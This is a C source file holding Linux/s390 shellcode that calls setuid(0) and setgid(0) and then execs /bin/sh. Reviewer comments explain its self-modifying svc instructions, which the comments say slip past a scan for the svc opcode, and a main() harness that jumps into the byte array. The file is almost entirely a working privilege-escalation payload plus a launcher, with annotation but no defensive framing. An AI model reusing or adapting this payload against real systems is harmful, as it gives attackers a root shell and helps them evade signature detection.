/* setuid/setgid 0 execve s390 shellcode                        */
/* code by jcyberpunk@thehackerschoice.com                      */

/*
 * Reviewer notes, derived from the bytes below.
 *
 * - Addressing: bassm with %r0 as its second operand does not branch; it
 *   only leaves the address of the next instruction in %r1. Every d(%r1)
 *   operand is therefore relative to byte offset 2 of this array.
 * - Self-modification: the two bytes at array offset 74 are stored as
 *   0b 17. The first stc rewrites the opcode byte to 0x0a (svc), giving
 *   svc 23; later stc instructions rewrite the number byte to 46 and then
 *   to 11. No 0x0a byte and no svc encoding is present in the static byte
 *   string, so a scan for the svc opcode will not match it, and the code
 *   can only run from memory that is both writable and executable.
 * - 23, 46 and 11 are setuid, setgid and execve in the 31-bit Linux/s390
 *   syscall table, which agrees with the header line; the target OS is
 *   not stated on this page -- confirm before relying on it.
 * - %r2 is cleared once, before the first call, and is not reloaded before
 *   the second; presumably it still holds the first call's return value.
 * - The trailing '\' (0x5c) after "/bin/sh" is a placeholder that is
 *   overwritten with a zero byte at run time. The two word stores at
 *   84(%r1) and 88(%r1) land on array offsets 86..93, i.e. on the literal's
 *   terminating NUL and beyond the end of the 87-byte array object.
 */
char shellcode[]=
"\x0c\x10"              /* bassm        %r1,%r0                 */
"\x41\x90\x10\x48"      /* la           %r9,72(%r1)             */
"\xa7\xa8\xfb\xb4"      /* lhi          %r10,-1100              */
/* %r6 = 1110 - 1100 = 10 (0x0a); stored over the opcode byte at offset 74 */
"\xa7\x68\x04\x56"      /* lhi          %r6,1110                */
"\x1a\x6a"              /* ar           %r6,%r10                */
"\x42\x60\x10\x48"      /* stc          %r6,72(%r1)             */
"\x17\x22"              /* xr           %r2,%r2                 */
"\x0d\xe9"              /* basr         %r14,%r9                */
/* %r6 = 1146 - 1100 = 46 (0x2e); stored over the number byte at offset 75 */
"\xa7\x68\x04\x7a"      /* lhi          %r6,1146                */
"\x1a\x6a"              /* ar           %r6,%r10                */
"\x42\x60\x10\x49"      /* stc          %r6,73(%r1)             */
"\x0d\xe9"              /* basr         %r14,%r9                */
/* %r6 = 1111 - 1100 = 11 (0x0b); stored over the number byte at offset 75 */
"\xa7\x68\x04\x57"      /* lhi          %r6,1111                */
"\x1a\x6a"              /* ar           %r6,%r10                */
"\x42\x60\x10\x49"      /* stc          %r6,73(%r1)             */
/* %r2 = address of the path string; %r3 = address of the word holding it */
"\x41\x20\x10\x4c"      /* la           %r2,76(%r1)             */
"\x50\x20\x10\x54"      /* st           %r2,84(%r1)             */
"\x41\x30\x10\x54"      /* la           %r3,84(%r1)             */
/* zero byte over the trailing '\', then a zero word that %r4 points at */
"\x17\x44"              /* xr           %r4,%r4                 */
"\x42\x40\x10\x53"      /* stc          %r4,83(%r1)             */
"\x50\x40\x10\x58"      /* st           %r4,88(%r1)             */
"\x41\x40\x10\x58"      /* la           %r4,88(%r1)             */
"\x0d\xe9"              /* basr         %r14,%r9                */
/* offset 74: target of every basr above; both bytes are patched at run time */
"\x0b\x17"              /* svc n after self-modification        */
"\x07\xfe"              /* br           %r14                    */
"\x2f\x62"              /* /b                                   */
"\x69\x6e\x2f\x73"      /* in/s                                 */
"\x68\x5c";             /* h\                                   */
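/*
 * Test harness: transfers control to the shellcode[] byte array.
 *
 * shellcode[] is an ordinary initialised data object and its bytes store
 * into themselves, so the call only proceeds where that data is mapped
 * both writable and executable; with non-executable data pages (NX / W^X)
 * the process faults at the call instead. Converting an object pointer to
 * a function pointer is outside ISO C, so this relies on the platform ABI.
 *
 * Returns 0 if control ever comes back from the call.
 */
int main(void)
{
    /* Explicit cast: the original relied on an implicit void* conversion. */
    void (*z)(void) = (void (*)(void))shellcode;

    z();
    return 0;
}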